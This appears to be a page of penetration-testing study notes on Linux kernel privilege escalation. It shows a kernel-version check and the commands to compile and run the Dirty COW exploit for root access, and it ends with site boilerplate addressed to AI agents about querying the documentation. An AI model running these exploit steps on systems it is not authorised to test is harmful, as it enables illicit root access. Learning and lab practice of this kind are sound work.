# Kernel Exploits

## Overview

The **Kernel** is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the **Kernel (system/core)** we become the **Kernel >:)**

{% embed url="<https://github.com/lucyoa/kernel-exploits>" %}

### Kernel version

```
uname -a
Linux debian 2.6.32-5-amd64
```

{% hint style="info" %}
Use the linux-exploit-suggester to identify kernel exploits quickly
{% endhint %}

## Dirty COW

Compile

```
gcc -pthread dirty.c -o c0w 
```

Upload and run

```
./c0w
passwd
```

<figure><img src="/files/eNsuWXUDSTsQnrJgAku4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/linux-privilege-escalation/kernel-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
